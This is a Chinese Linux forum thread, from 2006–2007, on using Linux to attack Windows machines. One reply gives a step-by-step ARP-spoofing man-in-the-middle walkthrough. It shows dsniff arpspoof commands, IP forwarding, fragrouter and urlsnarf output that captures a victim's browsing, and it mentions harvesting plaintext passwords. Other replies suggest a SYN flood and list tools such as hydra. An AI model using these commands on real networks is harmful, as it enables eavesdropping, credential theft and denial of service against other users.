LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
楼主: nali

怎么用linux攻击windows???

[复制链接]
发表于 2006-11-15 22:43:16 | 显示全部楼层
呵呵 不着急 现满满学习linux系统到使用再说
回复 支持 反对

使用道具 举报

发表于 2006-11-15 23:15:37 | 显示全部楼层
Post by Yuri
我本人就特讨厌国内黑客这一词。什么叫黑客?
国内的真正牛x人士也有。他们是真有技术,这另当别论
其他的那些用扫描器扫几个机器。再找个工具就叫黑客?狗屁。
tcp/ip 三卷读完了吗?什么叫网络?根本不懂!还恶心得说黑客?吐。
我在这也说点得罪人的话。国内的那些所谓什么黑客站点(除安全技术)其他的都是装的。
哈哈~这些不叫黑客,叫网络流|氓,也叫网络痞|子。就只会用一两个工具,在网上捣乱。

PS. 楼主想用Linux攻击Windows很易的~用你电脑砸他的电脑就行了。记住是主机对砸!(硬盘也可以)
回复 支持 反对

使用道具 举报

发表于 2006-11-16 12:07:51 | 显示全部楼层
哇,灌水的人真多阿~~~~~~~~~~~~~~~~
回复 支持 反对

使用道具 举报

发表于 2006-11-25 23:25:10 | 显示全部楼层
Post by Yuri
我本人就特讨厌国内黑客这一词。什么叫黑客?
国内的真正牛x人士也有。他们是真有技术,这另当别论
其他的那些用扫描器扫几个机器。再找个工具就叫黑客?狗屁。
tcp/ip 三卷读完了吗?什么叫网络?根本不懂!还恶心得说黑客?吐。
我在这也说点得罪人的话。国内的那些所谓什么黑客站点(除安全技术)其他的都是装的。


说得好
我以前也被那些所谓的站点吸引过
后来发现只是一帮浮躁的菜鸟+几个会用工具的xx
实在令人失望
回复 支持 反对

使用道具 举报

发表于 2007-1-16 21:45:14 | 显示全部楼层
Post by guccio
nc好啊,万能的瑞士军刀 !

linux下攻击windows机器我介绍一种,让同一个局域网的windows机器不能上网,当然,对linux机器同样试用。

安装dsniff,里面有arp的欺骗命令,然后欺骗网关,告诉网关你是那台机器,然后告诉那台机器你是网关,然后你就成为windows机器和网关之间的透明转发,这时,你只要关闭/proc下的ipforward就可以让那台windows机器不能上网,更深入下去,你可以截获所有那台机器通过你转发给网关和网管通过你转发给win机器的数据,当你指定固定的端口时,甚至可以截获某个协议明文传输的密码,那时。。。嘿嘿,你自己去想吧。

好好研究dsniff,会发现他才是真正厉害的工具组合。windows下那些黑客工具太初级了。


说到这个,我转一篇文章。
叫交换环境下的Sniffer
通常在局域网环境中,我们都是通过交换环境的网关上网的,在交换环境中使用NetXray或者NAI Sniffer一类的嗅探工具除了抓到自己的包以外,是不能看到其他主机的网络通信的。

 

但是我们可以通过利用ARP欺骗可以实现Sniffer的目的。

ARP协议是将IP解析为MAC地址的协议,局域网中的通信都是基于MAC的。

 

例如下面这样的情况:

在局域网中192.168.0.24和192.168.0.29都是通过网关192.168.0.1上网的,假定攻击者的系统为192.168.0.24,他希望听到192.168.0.29的通信,那么我们就可以利用ARP欺骗实现。

 

1、  首先告诉192.168.0.29,网关192.168.0.1的MAC地址是192.168.0.24

2、  告诉192.168.0.1,192.168.0.29的MAC地址是192.168.0.24。

 

这样192.168.0.29和192.168.0.1之间的数据包,就会发给192.168.0.24,也就是攻击者的机器,这样就可以听到会话了。但是这么做的有一个问题,192.168.0.29发现自己不能上网了,因为原来发给192.168.0.1的数据包都被192.168.0.24接收了,而并没有发给网关192.168.0.1。

 

这时候192.168.0.24设置一个包转发的东西就可以解决这个问题了,也就是从192.168.0.29收到的包转发给192.168.0.1,在把从192.168.0.1收到的包发给192.168.0.29。这样192.168.0.29根本就不会意识到自己被监听了。



具体实现:

1、  欺骗192.168.0.29,告诉这台机器网关192.168.0.1的MAC地址是自己(192.168.0.24)。

[root@Linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.29 192.168.0.1

0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71

0:0:21:0:0:18 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:0:21:0:0:18

………………………………..

这时候对192.168.0.29的ARP欺骗就开始了。

 

2、  欺骗192.168.0.1,告诉网关192.168.0.29的MAC地址是自己(192.168.0.24)。

[root@Linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.1 192.168.0.29

0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71

0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71

0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e

0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e

0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e

 

其实在这个时候192.168.0.29是可以发现的自己被欺骗了。在CMD下面使用ARP –a命令:

C:\WINNT>arp -a



Interface: 192.168.0.29 on Interface 0x1000003

  Internet Address      Physical Address      Type

  192.168.0.1           00-50-56-40-07-71     dynamic

  192.168.0.24          00-50-56-40-07-71     dynamic

两个IP地址的MAC地址居然是一模一样的!不过很少有人会这么做:-)。

 

3、  设置一个包转发

[root@Linux fragrouter-1.6]# ./fragrouter -B1

fragrouter: base-1: normal IP forwarding

在这之前别忘了首先需要打开包转发的功能

[root@Linux /proc]# echo 1 >/proc/sys/net/ipv4/ip_forward



万事具备,可以开始SNIFFER了。

例如想看看192.168.0.29在浏览什么地方:

 

[root@Linux dsniff-2.3]# ./urlsnarf

urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

 

Kitty[18/May/2002:20:02:25+1100]"GET http://pub72.ezboard.com/flasile ... 9.topic&index=7 HTTP/1.1" - - "http://www.google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&btnG=Google%E6%90%9C%E7%B4%A2&lr=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Kitty - - [18/May/2002:20:02:28 +1100] "GET http://www.ezboard.com/ztyles/default.css HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Kitty - - [18/May/2002:20:02:29 +1100] "GET http://www1.ezboard.com/spch.js?customerid=1147458082 HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"



当然也可以知道其他………:-)
回复 支持 反对

使用道具 举报

发表于 2007-1-24 14:06:54 | 显示全部楼层
自己去写个c程序好了,用synflood掉windows,自己试过一个小程序,效果很好,windows直接down掉!
回复 支持 反对

使用道具 举报

发表于 2007-1-24 15:02:32 | 显示全部楼层
linux下的黑客工具太多了,这些全都是:
  1. $ ls /usr/portage/net-analyzer/
  2. aimsniff       flow-tools        mrtg                    nmbscan         sniffit
  3. amap           fping             mrtg-ping-probe         ns              snmpmon
  4. angst          fprobe            mtr                     nsat            snmptt
  5. argus          fragroute         munin                   nstats          snort
  6. argus-clients  ftester           mwcollect               ntop            snortalog
  7. arping         fwlogwatch        nagios                  nttcp           snortsam
  8. arpoison       gensink           nagios-core             oinkmaster      sonar
  9. arp-sk         gnome-netstatus   nagios-imagepack        p0f             squid-graph
  10. arptools       gnome-nettool     nagios-nrpe             packit          squidsites
  11. arpwatch       gnu-netcat        nagios-nsca             paketto         ssldump
  12. authforce      gspoof            nagios-plugins          pbnj            ssmping
  13. barnyard       honeyd            nagios-sap-ccms-plugin  pchar           sussen
  14. base           hping             nam                     pinger          sysmon
  15. bigeye         httping           nast                    pktstat         tcpdump
  16. bing           hunt              nb                      pmacct          tcpflow
  17. bmon           hydra             nbaudit                 poink           tcpreen
  18. braa           hyperic-hq-agent  nbtscan                 portmon         tcpreplay
  19. bsnmp          ibmonitor         ndsad                   portsentry      tcpslice
  20. bwbar          ifmetric          nepenthes               postal          tcpstat
  21. bwm-ng         ifstat            nessus                  prelude-nagios  tcptrace
  22. bwmon          iftop             nessus-bin              prelude-nessus  tcptraceroute
  23. cacti          ike-scan          nessus-client           prelude-nids    tcptrack
  24. cacti-cactid   ipac-ng           nessus-core             prewikka        thcrut
  25. calamaris      ipaudit           nessus-libraries        quidscor        thrulay
  26. carl           ipcad             nessus-plugins          raddump         tleds
  27. chaosreader    iplog             netcat                  rain            tptest
  28. cnet           ippl              netcat6                 rrdcollect      traceproto
  29. cryptcat       iptraf            netdiscover             rrdtool         traceroute
  30. cutter         iptstate          netdude                 rtg             traceroute-nanog
  31. darkstat       isic              nethogs                 sancp           trafd
  32. dnstracer      jffnms            neti                    sara            traffic-vis
  33. dosdetector    jnettop           netio                   sarg            trafshow
  34. driftnet       knetscan          netperf                 sbd             ttcp
  35. dsniff         knocker           netselect               scanlogd        ttt
  36. echoping       labrea            net-snmp                scanssh         upnpscan
  37. egressor       lft               netspeed_applet         scapy           vnstat
  38. etherape       libnasl           nettop                  scli            wireshark
  39. ethloop        linkchecker       netwag                  sec             xnetload
  40. ethstatus      macchanger        netwatch                sflowtool       xprobe
  41. ettercap       mbrowse           netwox                  sguil-client    yersinia
  42. fail2ban       metadata.xml      nfdump                  sguil-sensor    zabbix-agent
  43. fe3d           metasploit        ngrep                   sguil-server    zabbix-frontend
  44. ffp            midas-nms         nikto                   siphon          zabbix-server
  45. firewalk       mirmon            nload                   slurm           zodiac
  46. FlowScan       mping             nmap                    smokeping
复制代码

这几个是我经常用到的:
wireshark: 图形界面的协议分析工具
tcpdump: 协议分析
netcat: 网络瑞士军刀
hydra: 暴力攻击
dsniff: 网络监控工具箱,包括dsniff(密码收集), arpspoof(ARP欺骗), urlsnarf(URL监看)等…
hunt: 漏洞猎手
回复 支持 反对

使用道具 举报

发表于 2007-1-26 16:05:23 | 显示全部楼层
hydra是不是太邪恶了,ubuntu的源里都不提供,楼上的能提供安装包或者源码吗?
回复 支持 反对

使用道具 举报

发表于 2007-1-27 13:35:33 | 显示全部楼层
这种贴子,经常能引起大量的讨论,甚至是无谓的争论

用linux攻击windows
用windows攻击windows

并无区别
回复 支持 反对

使用道具 举报

发表于 2007-1-30 21:15:10 | 显示全部楼层
可惜帮不了楼主。
回去狂看TCP/IP详解,狂学编程
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表